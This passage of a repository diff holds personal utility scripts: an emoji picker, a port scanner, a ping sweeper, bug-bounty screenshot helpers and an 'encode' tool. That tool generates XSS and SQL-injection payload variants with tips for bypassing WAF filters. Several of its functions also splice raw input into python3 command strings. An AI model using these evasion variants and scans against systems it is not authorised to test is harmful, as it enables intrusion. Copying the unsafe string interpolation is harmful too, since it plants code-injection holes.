👨🌾 man farmer agriculture
|
||||
👩🌾 woman farmer agriculture
|
||||
🧑🍳 cook chef cooking
|
||||
👨🍳 man cook chef
|
||||
👩🍳 woman cook chef
|
||||
🧑🔧 mechanic technician repair
|
||||
👨🔧 man mechanic technician
|
||||
👩🔧 woman mechanic technician
|
||||
🧑🏭 factory worker industrial
|
||||
👨🏭 man factory worker
|
||||
👩🏭 woman factory worker
|
||||
🧑💼 office worker business professional
|
||||
👨💼 man office worker business
|
||||
👩💼 woman office worker business
|
||||
🧑🔬 scientist research lab
|
||||
👨🔬 man scientist research
|
||||
👩🔬 woman scientist research
|
||||
🧑💻 technologist developer programmer coder hacker computer
|
||||
👨💻 man technologist developer programmer
|
||||
👩💻 woman technologist developer programmer
|
||||
🧑🎤 singer performer music artist
|
||||
👨🎤 man singer rockstar
|
||||
👩🎤 woman singer rockstar
|
||||
🧑🎨 artist painter creative
|
||||
👨🎨 man artist painter
|
||||
👩🎨 woman artist painter
|
||||
🧑✈️ pilot aviation plane flight
|
||||
👨✈️ man pilot aviation
|
||||
👩✈️ woman pilot aviation
|
||||
🧑🚀 astronaut space cosmonaut
|
||||
👨🚀 man astronaut space
|
||||
👩🚀 woman astronaut space
|
||||
🧑🚒 firefighter fire emergency
|
||||
👨🚒 man firefighter fire
|
||||
👩🚒 woman firefighter fire
|
||||
👮 police officer cop law enforcement
|
||||
👮♂️ man police officer cop
|
||||
👮♀️ woman police officer cop
|
||||
🕵️ detective spy investigator sleuth
|
||||
🕵️♂️ man detective spy
|
||||
🕵️♀️ woman detective spy
|
||||
💂 guard soldier royal british
|
||||
💂♂️ man guard soldier
|
||||
💂♀️ woman guard soldier
|
||||
🥷 ninja stealth assassin martial arts
|
||||
👷 construction worker builder hard hat
|
||||
👷♂️ man construction worker builder
|
||||
👷♀️ woman construction worker builder
|
||||
🫅 person crown royalty monarch king queen
|
||||
🤴 prince royalty nobility fairy tale
|
||||
👸 princess royalty nobility fairy tale
|
||||
👳 person turban wearing turban
|
||||
👳♂️ man turban wearing
|
||||
👳♀️ woman turban wearing
|
||||
👲 person skullcap cap hat chinese
|
||||
🧕 woman headscarf hijab muslim
|
||||
🤵 person tuxedo formal wedding groom
|
||||
🤵♂️ man tuxedo formal groom
|
||||
🤵♀️ woman tuxedo formal
|
||||
👰 person veil wedding bride marriage
|
||||
👰♂️ man veil wedding groom
|
||||
👰♀️ woman veil wedding bride
|
||||
🤰 pregnant woman expecting baby
|
||||
🫃 pregnant man trans expecting
|
||||
🫄 pregnant person expecting baby
|
||||
👼 baby angel cherub halo innocent
|
||||
🎅 santa claus christmas saint nick father christmas
|
||||
🤶 mrs claus christmas mother
|
||||
🧑🎄 mx claus christmas gender neutral
|
||||
🦸 superhero hero power super cape
|
||||
🦸♂️ man superhero hero
|
||||
🦸♀️ woman superhero hero
|
||||
🦹 supervillain villain evil bad
|
||||
🦹♂️ man supervillain villain
|
||||
🦹♀️ woman supervillain villain
|
||||
🧙 mage wizard witch magic sorcerer
|
||||
🧙♂️ man mage wizard sorcerer
|
||||
🧙♀️ woman mage witch sorceress
|
||||
🧚 fairy magic pixie sprite wings
|
||||
🧚♂️ man fairy magic
|
||||
🧚♀️ woman fairy magic pixie
|
||||
🧛 vampire dracula undead fangs blood
|
||||
🧛♂️ man vampire dracula
|
||||
🧛♀️ woman vampire dracula
|
||||
🧜 merperson mermaid merman ocean sea
|
||||
🧜♂️ merman triton ocean
|
||||
🧜♀️ mermaid ariel ocean
|
||||
🧝 elf fantasy magic legolas
|
||||
🧝♂️ man elf fantasy
|
||||
🧝♀️ woman elf fantasy
|
||||
🧞 genie magic wish lamp djinn
|
||||
🧞♂️ man genie magic
|
||||
🧞♀️ woman genie magic
|
||||
🧟 zombie undead walker brain dead
|
||||
🧟♂️ man zombie undead
|
||||
🧟♀️ woman zombie undead
|
||||
🧌 troll internet monster ugly
|
||||
💆 person getting massage spa relaxation
|
||||
💆♂️ man getting massage spa
|
||||
💆♀️ woman getting massage spa
|
||||
💇 person getting haircut salon barber
|
||||
💇♂️ man getting haircut barber
|
||||
💇♀️ woman getting haircut salon
|
||||
🚶 person walking walk stroll
|
||||
🚶♂️ man walking walk
|
||||
🚶♀️ woman walking walk
|
||||
🧍 person standing stand up
|
||||
🧍♂️ man standing stand
|
||||
🧍♀️ woman standing stand
|
||||
🧎 person kneeling kneel pray
|
||||
🧎♂️ man kneeling kneel
|
||||
🧎♀️ woman kneeling kneel
|
||||
🧑🦯 person white cane blind visually impaired
|
||||
👨🦯 man white cane blind
|
||||
👩🦯 woman white cane blind
|
||||
🧑🦼 person motorized wheelchair disabled
|
||||
👨🦼 man motorized wheelchair disabled
|
||||
👩🦼 woman motorized wheelchair disabled
|
||||
🧑🦽 person manual wheelchair disabled
|
||||
👨🦽 man manual wheelchair disabled
|
||||
👩🦽 woman manual wheelchair disabled
|
||||
🏃 person running run jog exercise sprint
|
||||
🏃♂️ man running run jog
|
||||
🏃♀️ woman running run jog
|
||||
💃 woman dancing dance party salsa
|
||||
🕺 man dancing dance party disco
|
||||
🕴️ person suit levitating floating hovering
|
||||
👯 people bunny ears party dancers
|
||||
👯♂️ men bunny ears party
|
||||
👯♀️ women bunny ears party
|
||||
🧖 person steamy room sauna spa steam
|
||||
🧖♂️ man steamy room sauna
|
||||
🧖♀️ woman steamy room sauna
|
||||
🧗 person climbing climb rock climbing
|
||||
🧗♂️ man climbing climb
|
||||
🧗♀️ woman climbing climb
|
||||
🤺 person fencing sword sport
|
||||
🏇 horse racing jockey racing equestrian
|
||||
⛷️ skier skiing snow winter sport
|
||||
🏂 snowboarder snowboarding snow winter
|
||||
🏌️ person golfing golf sport
|
||||
🏌️♂️ man golfing golf
|
||||
🏌️♀️ woman golfing golf
|
||||
🏄 person surfing surf wave beach
|
||||
🏄♂️ man surfing surf wave
|
||||
🏄♀️ woman surfing surf wave
|
||||
🚣 person rowing boat row water
|
||||
🚣♂️ man rowing boat row
|
||||
🚣♀️ woman rowing boat row
|
||||
🏊 person swimming swim pool water
|
||||
🏊♂️ man swimming swim
|
||||
🏊♀️ woman swimming swim
|
||||
⛹️ person bouncing ball basketball sport
|
||||
⛹️♂️ man bouncing ball basketball
|
||||
⛹️♀️ woman bouncing ball basketball
|
||||
🏋️ person lifting weights gym workout exercise
|
||||
🏋️♂️ man lifting weights gym
|
||||
🏋️♀️ woman lifting weights gym
|
||||
🚴 person biking bike bicycle cycling
|
||||
🚴♂️ man biking bike bicycle
|
||||
🚴♀️ woman biking bike bicycle
|
||||
🚵 person mountain biking bike trail
|
||||
🚵♂️ man mountain biking bike
|
||||
🚵♀️ woman mountain biking bike
|
||||
🤸 person cartwheeling gymnastics cartwheel
|
||||
🤸♂️ man cartwheeling gymnastics
|
||||
🤸♀️ woman cartwheeling gymnastics
|
||||
🤼 people wrestling wrestle sport
|
||||
🤼♂️ men wrestling wrestle
|
||||
🤼♀️ women wrestling wrestle
|
||||
🤽 person playing water polo water sport
|
||||
🤽♂️ man playing water polo
|
||||
🤽♀️ woman playing water polo
|
||||
🤾 person playing handball handball sport
|
||||
🤾♂️ man playing handball
|
||||
🤾♀️ woman playing handball
|
||||
🤹 person juggling juggle circus performance
|
||||
🤹♂️ man juggling juggle
|
||||
🤹♀️ woman juggling juggle
|
||||
🧘 person lotus position yoga meditation zen
|
||||
🧘♂️ man lotus position yoga
|
||||
🧘♀️ woman lotus position yoga
|
||||
🛀 person taking bath bathtub shower relaxing
|
||||
🛌 person bed sleeping rest sleep
|
||||
🧑🤝🧑 people holding hands friends together couple
|
||||
👭 women holding hands friends together couple
|
||||
👫 woman man holding hands couple together
|
||||
👬 men holding hands friends together couple
|
||||
💏 kiss couple love romance kissing
|
||||
👩❤️💋👨 kiss woman man couple love
|
||||
👨❤️💋👨 kiss man man couple love gay
|
||||
👩❤️💋👩 kiss woman woman couple love lesbian
|
||||
💑 couple heart love together romance
|
||||
👩❤️👨 couple heart woman man love
|
||||
👨❤️👨 couple heart man man love gay
|
||||
👩❤️👩 couple heart woman woman love lesbian
|
||||
👨👩👦 family man woman boy parents child
|
||||
👨👩👧 family man woman girl parents child
|
||||
👨👩👧👦 family man woman girl boy parents children
|
||||
👨👩👦👦 family man woman boy boy parents children
|
||||
👨👩👧👧 family man woman girl girl parents children
|
||||
👨👨👦 family man man boy gay parents
|
||||
👨👨👧 family man man girl gay parents
|
||||
👨👨👧👦 family man man girl boy gay parents
|
||||
👨👨👦👦 family man man boy boy gay parents
|
||||
👨👨👧👧 family man man girl girl gay parents
|
||||
👩👩👦 family woman woman boy lesbian parents
|
||||
👩👩👧 family woman woman girl lesbian parents
|
||||
👩👩👧👦 family woman woman girl boy lesbian parents
|
||||
👩👩👦👦 family woman woman boy boy lesbian parents
|
||||
👩👩👧👧 family woman woman girl girl lesbian parents
|
||||
👨👦 family man boy father son parent
|
||||
👨👦👦 family man boy boy father sons
|
||||
👨👧 family man girl father daughter
|
||||
👨👧👦 family man girl boy father children
|
||||
👨👧👧 family man girl girl father daughters
|
||||
👩👦 family woman boy mother son parent
|
||||
👩👦👦 family woman boy boy mother sons
|
||||
👩👧 family woman girl mother daughter
|
||||
👩👧👦 family woman girl boy mother children
|
||||
👩👧👧 family woman girl girl mother daughters
|
||||
🗣️ speaking head talking voice sound speaking
|
||||
👤 bust silhouette profile person user
|
||||
👥 busts silhouette people users group crowd
|
||||
🫂 people hugging hug embrace support comfort
|
||||
👣 footprints feet steps walking tracks"
|
||||
|
||||
if command -v fzf &>/dev/null; then
|
||||
# Interactive mode with fzf
|
||||
if [[ $# -eq 0 ]]; then
|
||||
selected=$(echo "$emojis" | fzf --height=60% --layout=reverse \
|
||||
--prompt="Select emoji: " \
|
||||
--preview='echo {}' \
|
||||
--preview-window=up:1:wrap)
|
||||
if [[ -n "$selected" ]]; then
|
||||
emoji_char=$(echo "$selected" | awk '{print $1}')
|
||||
echo -n "$emoji_char" | pbcopy
|
||||
echo "Copied: $emoji_char"
|
||||
fi
|
||||
else
|
||||
# Search mode
|
||||
echo "$emojis" | grep -i "$@" | head -20
|
||||
fi
|
||||
else
|
||||
# Fallback without fzf - just search
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "$emojis"
|
||||
else
|
||||
echo "$emojis" | grep -i "$@"
|
||||
fi
|
||||
fi
|
||||
316
scripts/encode
Executable file
316
scripts/encode
Executable file
|
|
@ -0,0 +1,316 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: encode
|
||||
# Description: Encoding/Decoding Swiss Army Knife for security testing
|
||||
# Usage: encode base64 "hello" # Base64 encode
|
||||
# encode base64d "aGVsbG8=" # Base64 decode
|
||||
# encode url "hello world" # URL encode
|
||||
# encode urld "hello%20world" # URL decode
|
||||
# encode html "<script>" # HTML entity encode
|
||||
# encode htmld "<script>" # HTML entity decode
|
||||
# encode hex "hello" # Hex encode
|
||||
# encode hexd "68656c6c6f" # Hex decode
|
||||
# encode jwt <token> # Decode JWT
|
||||
# encode hash md5 "password" # Generate hash
|
||||
# pbpaste | encode base64 # Pipe from clipboard
|
||||
# encode xss "<script>" # Multiple XSS encodings
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}encode${NC} - Encoding/Decoding Swiss Army Knife v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " encode <operation> <input>"
|
||||
echo " echo <input> | encode <operation>"
|
||||
echo
|
||||
echo -e "${BOLD}ENCODING OPERATIONS:${NC}"
|
||||
echo -e " ${CYAN}base64${NC} Base64 encode"
|
||||
echo -e " ${CYAN}base64d${NC} Base64 decode"
|
||||
echo -e " ${CYAN}url${NC} URL encode"
|
||||
echo -e " ${CYAN}urld${NC} URL decode"
|
||||
echo -e " ${CYAN}html${NC} HTML entity encode"
|
||||
echo -e " ${CYAN}htmld${NC} HTML entity decode"
|
||||
echo -e " ${CYAN}hex${NC} Hexadecimal encode"
|
||||
echo -e " ${CYAN}hexd${NC} Hexadecimal decode"
|
||||
echo -e " ${CYAN}unicode${NC} Unicode escape sequences (\\uXXXX)"
|
||||
echo -e " ${CYAN}unicoded${NC} Unicode unescape"
|
||||
echo
|
||||
echo -e "${BOLD}HASH OPERATIONS:${NC}"
|
||||
echo -e " ${CYAN}hash md5${NC} MD5 hash"
|
||||
echo -e " ${CYAN}hash sha1${NC} SHA1 hash"
|
||||
echo -e " ${CYAN}hash sha256${NC} SHA256 hash"
|
||||
echo -e " ${CYAN}hash sha512${NC} SHA512 hash"
|
||||
echo
|
||||
echo -e "${BOLD}SECURITY OPERATIONS:${NC}"
|
||||
echo -e " ${CYAN}jwt${NC} Decode JWT token (no verification)"
|
||||
echo -e " ${CYAN}xss${NC} Generate XSS payload variants"
|
||||
echo -e " ${CYAN}sqli${NC} Generate SQL injection variants"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " encode base64 \"hello world\""
|
||||
echo " echo \"test\" | encode url"
|
||||
echo " pbpaste | encode base64 | pbcopy"
|
||||
echo " encode jwt eyJhbGc..."
|
||||
echo " encode hash sha256 \"password\""
|
||||
echo " encode xss \"<script>alert(1)</script>\""
|
||||
echo
|
||||
echo -e "${BOLD}SECURITY NOTE:${NC}"
|
||||
echo " This tool is for authorized security testing and educational purposes only."
|
||||
}
|
||||
|
||||
# Read input from argument or stdin
|
||||
get_input() {
|
||||
if [[ $# -gt 0 ]]; then
|
||||
echo "$*"
|
||||
else
|
||||
cat
|
||||
fi
|
||||
}
|
||||
|
||||
# Base64 operations
|
||||
base64_encode() {
|
||||
local input=$(get_input "$@")
|
||||
echo -n "$input" | base64 -w 0 2>/dev/null || echo -n "$input" | base64
|
||||
}
|
||||
|
||||
base64_decode() {
|
||||
local input=$(get_input "$@")
|
||||
echo -n "$input" | base64 -d 2>/dev/null || echo -n "$input" | base64 -D
|
||||
}
|
||||
|
||||
# URL operations
|
||||
url_encode() {
|
||||
local input=$(get_input "$@")
|
||||
python3 -c "import urllib.parse; print(urllib.parse.quote('$input'))"
|
||||
}
|
||||
|
||||
url_decode() {
|
||||
local input=$(get_input "$@")
|
||||
python3 -c "import urllib.parse; print(urllib.parse.unquote('$input'))"
|
||||
}
|
||||
|
||||
# HTML operations
|
||||
html_encode() {
|
||||
local input=$(get_input "$@")
|
||||
python3 -c "import html; print(html.escape('$input'))"
|
||||
}
|
||||
|
||||
html_decode() {
|
||||
local input=$(get_input "$@")
|
||||
python3 -c "import html; print(html.unescape('$input'))"
|
||||
}
|
||||
|
||||
# Hex operations
|
||||
hex_encode() {
|
||||
local input=$(get_input "$@")
|
||||
echo -n "$input" | xxd -p | tr -d '\n'
|
||||
}
|
||||
|
||||
hex_decode() {
|
||||
local input=$(get_input "$@")
|
||||
echo -n "$input" | xxd -r -p
|
||||
}
|
||||
|
||||
# Unicode operations
|
||||
unicode_encode() {
|
||||
local input=$(get_input "$@")
|
||||
python3 << EOF
|
||||
import sys
|
||||
text = "$input"
|
||||
result = ''.join(f'\\u{ord(c):04x}' for c in text)
|
||||
print(result)
|
||||
EOF
|
||||
}
|
||||
|
||||
unicode_decode() {
|
||||
local input=$(get_input "$@")
|
||||
python3 -c "print('$input'.encode().decode('unicode_escape'))"
|
||||
}
|
||||
|
||||
# JWT decode
|
||||
jwt_decode() {
|
||||
local token=$(get_input "$@")
|
||||
|
||||
# Split JWT into parts
|
||||
IFS='.' read -ra PARTS <<< "$token"
|
||||
|
||||
if [[ ${#PARTS[@]} -ne 3 ]]; then
|
||||
echo "${RED}Error: Invalid JWT format${NC}" >&2
|
||||
return 1
|
||||
fi
|
||||
|
||||
echo -e "${BOLD}${CYAN}=== JWT Header ===${NC}"
|
||||
echo "${PARTS[0]}" | base64_decode | python3 -m json.tool
|
||||
|
||||
echo -e "\n${BOLD}${CYAN}=== JWT Payload ===${NC}"
|
||||
echo "${PARTS[1]}" | base64_decode | python3 -m json.tool
|
||||
|
||||
echo -e "\n${BOLD}${YELLOW}Note: Signature not verified${NC}"
|
||||
}
|
||||
|
||||
# Hash generation
|
||||
generate_hash() {
|
||||
local algo=$1
|
||||
shift
|
||||
local input=$(get_input "$@")
|
||||
|
||||
case "$algo" in
|
||||
md5)
|
||||
echo -n "$input" | md5sum | awk '{print $1}'
|
||||
;;
|
||||
sha1)
|
||||
echo -n "$input" | sha1sum | awk '{print $1}'
|
||||
;;
|
||||
sha256)
|
||||
echo -n "$input" | sha256sum | awk '{print $1}'
|
||||
;;
|
||||
sha512)
|
||||
echo -n "$input" | sha512sum | awk '{print $1}'
|
||||
;;
|
||||
*)
|
||||
echo "${RED}Error: Unknown hash algorithm: $algo${NC}" >&2
|
||||
echo "Available: md5, sha1, sha256, sha512" >&2
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# XSS payload variants
|
||||
xss_variants() {
|
||||
local input=$(get_input "$@")
|
||||
|
||||
echo -e "${BOLD}${CYAN}=== XSS Payload Variants ===${NC}\n"
|
||||
|
||||
echo -e "${YELLOW}[Original]${NC}"
|
||||
echo "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[URL Encoded]${NC}"
|
||||
url_encode "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
|
||||
url_encode "$(url_encode "$input")"
|
||||
|
||||
echo -e "\n${YELLOW}[HTML Entity Encoded]${NC}"
|
||||
html_encode "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[Hex Encoded]${NC}"
|
||||
hex_encode "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[Base64]${NC}"
|
||||
base64_encode "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[Unicode Escaped]${NC}"
|
||||
unicode_encode "$input"
|
||||
|
||||
echo -e "\n${BOLD}${GREEN}Tip: Use these to bypass WAF filters${NC}"
|
||||
}
|
||||
|
||||
# SQL injection variants
|
||||
sqli_variants() {
|
||||
local input=$(get_input "$@")
|
||||
|
||||
echo -e "${BOLD}${CYAN}=== SQL Injection Variants ===${NC}\n"
|
||||
|
||||
echo -e "${YELLOW}[Original]${NC}"
|
||||
echo "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[URL Encoded]${NC}"
|
||||
url_encode "$input"
|
||||
|
||||
echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
|
||||
url_encode "$(url_encode "$input")"
|
||||
|
||||
echo -e "\n${YELLOW}[Uppercase]${NC}"
|
||||
echo "$input" | tr '[:lower:]' '[:upper:]'
|
||||
|
||||
echo -e "\n${YELLOW}[Mixed Case]${NC}"
|
||||
python3 << EOF
|
||||
import random
|
||||
text = "$input"
|
||||
result = ''.join(c.upper() if random.random() > 0.5 else c.lower() for c in text)
|
||||
print(result)
|
||||
EOF
|
||||
|
||||
echo -e "\n${YELLOW}[With Comments]${NC}"
|
||||
echo "$input" | sed 's/ /\/**\/ /g'
|
||||
|
||||
echo -e "\n${BOLD}${GREEN}Tip: Combine with timing to test blind SQLi${NC}"
|
||||
}
|
||||
|
||||
# Main logic
|
||||
if [[ $# -eq 0 ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
operation=$1
|
||||
shift
|
||||
|
||||
case "$operation" in
|
||||
-h|--help|help)
|
||||
show_help
|
||||
;;
|
||||
base64|b64)
|
||||
base64_encode "$@"
|
||||
;;
|
||||
base64d|b64d)
|
||||
base64_decode "$@"
|
||||
;;
|
||||
url)
|
||||
url_encode "$@"
|
||||
;;
|
||||
urld)
|
||||
url_decode "$@"
|
||||
;;
|
||||
html)
|
||||
html_encode "$@"
|
||||
;;
|
||||
htmld)
|
||||
html_decode "$@"
|
||||
;;
|
||||
hex)
|
||||
hex_encode "$@"
|
||||
;;
|
||||
hexd)
|
||||
hex_decode "$@"
|
||||
;;
|
||||
unicode|uni)
|
||||
unicode_encode "$@"
|
||||
;;
|
||||
unicoded|unid)
|
||||
unicode_decode "$@"
|
||||
;;
|
||||
jwt)
|
||||
jwt_decode "$@"
|
||||
;;
|
||||
hash)
|
||||
if [[ $# -eq 0 ]]; then
|
||||
echo "${RED}Error: Hash algorithm required${NC}" >&2
|
||||
echo "Usage: encode hash <md5|sha1|sha256|sha512> <input>" >&2
|
||||
exit 1
|
||||
fi
|
||||
generate_hash "$@"
|
||||
;;
|
||||
xss)
|
||||
xss_variants "$@"
|
||||
;;
|
||||
sqli|sql)
|
||||
sqli_variants "$@"
|
||||
;;
|
||||
*)
|
||||
echo "${RED}Error: Unknown operation: $operation${NC}" >&2
|
||||
echo "Run 'encode --help' for usage information" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
93
scripts/fast-portscan.py
Executable file
93
scripts/fast-portscan.py
Executable file
|
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python3
|
||||
|
||||
import socket
|
||||
import common_ports
|
||||
import os
|
||||
import sys
|
||||
import re
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
|
||||
|
||||
def scan_port(ip_addr, port):
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(1)
|
||||
result = s.connect_ex((ip_addr, port))
|
||||
s.close()
|
||||
if result == 0:
|
||||
return port
|
||||
except:
|
||||
return None
|
||||
return None
|
||||
|
||||
|
||||
def get_open_ports(target, port_range, verbose=False):
|
||||
open_ports = []
|
||||
|
||||
# Try resolving the target
|
||||
try:
|
||||
ip_addr = socket.gethostbyname(target)
|
||||
except socket.gaierror:
|
||||
if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
|
||||
return "Error: Invalid IP address"
|
||||
else:
|
||||
return "Error: Invalid hostname"
|
||||
|
||||
# Build the list of ports from range
|
||||
ports_list = list(range(port_range[0], port_range[1] + 1))
|
||||
|
||||
with ThreadPoolExecutor(max_workers=100) as executor:
|
||||
futures = [executor.submit(scan_port, ip_addr, port) for port in ports_list]
|
||||
for future in futures:
|
||||
result = future.result()
|
||||
if result:
|
||||
open_ports.append(result)
|
||||
|
||||
# Output
|
||||
if verbose:
|
||||
try:
|
||||
hostname = socket.gethostbyaddr(ip_addr)[0]
|
||||
except socket.herror:
|
||||
hostname = target
|
||||
|
||||
output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
|
||||
try:
|
||||
import common_ports
|
||||
for port in open_ports:
|
||||
service = common_ports.ports_and_services.get(port, 'unknown')
|
||||
output += f"{port:<9}{service}\n"
|
||||
except ImportError:
|
||||
for port in open_ports:
|
||||
output += f"{port:<9}unknown\n"
|
||||
return output.strip()
|
||||
|
||||
return open_ports
|
||||
|
||||
|
||||
# print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: python3 portscan.py <ip_or_file> [start_port] [end_port] [--verbose]")
|
||||
return
|
||||
|
||||
input_arg = sys.argv[1]
|
||||
start_port = int(sys.argv[2]) if len(sys.argv) > 2 else 20
|
||||
end_port = int(sys.argv[3]) if len(sys.argv) > 3 else 1024
|
||||
verbose = "--verbose" in sys.argv
|
||||
|
||||
targets = []
|
||||
|
||||
if os.path.isfile(input_arg):
|
||||
with open(input_arg) as f:
|
||||
targets = [line.strip() for line in f if line.strip()]
|
||||
else:
|
||||
targets = [input_arg]
|
||||
|
||||
for target in targets:
|
||||
print(get_open_ports(target, [start_port, end_port], verbose))
|
||||
print("-" * 40)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
53
scripts/fast-psweep.py
Executable file
53
scripts/fast-psweep.py
Executable file
|
|
@ -0,0 +1,53 @@
|
|||
import sys
|
||||
import subprocess
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
|
||||
|
||||
def ping_host(ip):
|
||||
result = subprocess.run(
|
||||
["ping", "-c", "1", "-W", "1", ip],
|
||||
stdout=subprocess.DEVNULL
|
||||
)
|
||||
return ip if result.returncode == 0 else None
|
||||
|
||||
|
||||
def ping_sweep(network_prefix, max_threads=100):
|
||||
live_hosts = []
|
||||
|
||||
with ThreadPoolExecutor(max_workers=max_threads) as executor:
|
||||
futures = [executor.submit(ping_host, f"{network_prefix}.{i}") for i in range(1, 256)]
|
||||
|
||||
for future in as_completed(futures):
|
||||
result = future.result()
|
||||
if result:
|
||||
print(f"{result} is up.")
|
||||
live_hosts.append(result)
|
||||
|
||||
return live_hosts
|
||||
|
||||
|
||||
# ---- Entry Point ----
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: python3 pingsweep.py <network_prefix>")
|
||||
print("Example: python3 pingsweep.py 192.168.1")
|
||||
sys.exit(1)
|
||||
|
||||
# Assume prefix like "192.168.1"
|
||||
prefix = sys.argv[1]
|
||||
timestamp = time.strftime('%Y%m%d-%H%M%S')
|
||||
filename = f'{prefix}.0_24_{timestamp}.txt'
|
||||
|
||||
print(f"Scanning {prefix}.1 to {prefix}.255 ...")
|
||||
hosts = ping_sweep(prefix)
|
||||
|
||||
print("\nLive hosts:")
|
||||
for host in hosts:
|
||||
print(host)
|
||||
|
||||
with open(filename, 'w') as f:
|
||||
for host in hosts:
|
||||
f.write(host + '\n')
|
||||
|
||||
print(f'Saved live hosts to {filename}')
|
||||
14
scripts/flameshot-bb
Executable file
14
scripts/flameshot-bb
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
#!/bin/bash
|
||||
|
||||
TEMP="/tmp/flameshot_$(date +%s).png"
|
||||
flameshot gui -p "$TEMP"
|
||||
if [[ -f "$TEMP" ]]; then
|
||||
convert "$TEMP" \
|
||||
-bordercolor '#DC143C' -border 3 \
|
||||
-bordercolor white -border 12 \
|
||||
-bordercolor '#333333' -border 1 \
|
||||
\( +clone -background black -shadow 80x5+8+8 \) \
|
||||
+swap -background white -layers merge +repage \
|
||||
~/Pictures/Screenshots/bb_$(date +%Y%m%d_%H%M%S).png
|
||||
rm "$TEMP"
|
||||
fi
|
||||
28
scripts/flameshot-bb-edit
Executable file
28
scripts/flameshot-bb-edit
Executable file
|
|
@ -0,0 +1,28 @@
|
|||
#!/bin/bash
|
||||
# Bug Bounty Documentation Screenshot: Annotate -> Add border -> Save
|
||||
# Usage: Bound to Shift+Super+D
|
||||
|
||||
TEMP="/tmp/flameshot_$(date +%s).png"
|
||||
|
||||
# This will open Flameshot GUI with all annotation tools available
|
||||
flameshot gui -p "$TEMP"
|
||||
|
||||
if [[ -f "$TEMP" ]]; then
|
||||
# Add professional border
|
||||
convert "$TEMP" \
|
||||
-bordercolor '#DC143C' -border 3 \
|
||||
-bordercolor white -border 12 \
|
||||
-bordercolor '#333333' -border 1 \
|
||||
\( +clone -background black -shadow 80x5+8+8 \) \
|
||||
+swap -background white -layers merge +repage \
|
||||
~/Pictures/Screenshots/bb_doc_$(date +%Y%m%d_%H%M%S).png
|
||||
|
||||
rm "$TEMP"
|
||||
|
||||
# Copy relative path to clipboard
|
||||
LATEST=$(ls -t ~/Pictures/Screenshots/bb_doc_*.png 2>/dev/null | head -1)
|
||||
if [[ -n "$LATEST" ]]; then
|
||||
echo "Screenshots/$(basename "$LATEST")" | xclip -selection clipboard 2>/dev/null || true
|
||||
notify-send "Bug Bounty Screenshot" "Saved: $(basename "$LATEST")" 2>/dev/null || true
|
||||
fi
|
||||
fi
|
||||
75
scripts/httpstatus
Executable file
75
scripts/httpstatus
Executable file
|
|
@ -0,0 +1,75 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: httpstatus
|
||||
# Description: HTTP status code reference lookup
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: httpstatus # show all
|
||||
# httpstatus 404 # search for 404
|
||||
# httpstatus server # search for "server"
|
||||
|
||||
statuses="100 Continue
|
||||
101 Switching Protocols
|
||||
102 Processing
|
||||
200 OK
|
||||
201 Created
|
||||
202 Accepted
|
||||
203 Non-Authoritative Information
|
||||
204 No Content
|
||||
205 Reset Content
|
||||
206 Partial Content
|
||||
207 Multi-Status
|
||||
208 Already Reported
|
||||
300 Multiple Choices
|
||||
301 Moved Permanently
|
||||
302 Found
|
||||
303 See Other
|
||||
304 Not Modified
|
||||
305 Use Proxy
|
||||
307 Temporary Redirect
|
||||
400 Bad Request
|
||||
401 Unauthorized
|
||||
402 Payment Required
|
||||
403 Forbidden
|
||||
404 Not Found
|
||||
405 Method Not Allowed
|
||||
406 Not Acceptable
|
||||
407 Proxy Authentication Required
|
||||
408 Request Timeout
|
||||
409 Conflict
|
||||
410 Gone
|
||||
411 Length Required
|
||||
412 Precondition Failed
|
||||
413 Request Entity Too Large
|
||||
414 Request-URI Too Large
|
||||
415 Unsupported Media Type
|
||||
416 Request Range Not Satisfiable
|
||||
417 Expectation Failed
|
||||
418 I'm a teapot
|
||||
420 Blaze it
|
||||
422 Unprocessable Entity
|
||||
423 Locked
|
||||
424 Failed Dependency
|
||||
425 No code
|
||||
426 Upgrade Required
|
||||
428 Precondition Required
|
||||
429 Too Many Requests
|
||||
431 Request Header Fields Too Large
|
||||
449 Retry with
|
||||
500 Internal Server Error
|
||||
501 Not Implemented
|
||||
502 Bad Gateway
|
||||
503 Service Unavailable
|
||||
504 Gateway Timeout
|
||||
505 HTTP Version Not Supported
|
||||
506 Variant Also Negotiates
|
||||
507 Insufficient Storage
|
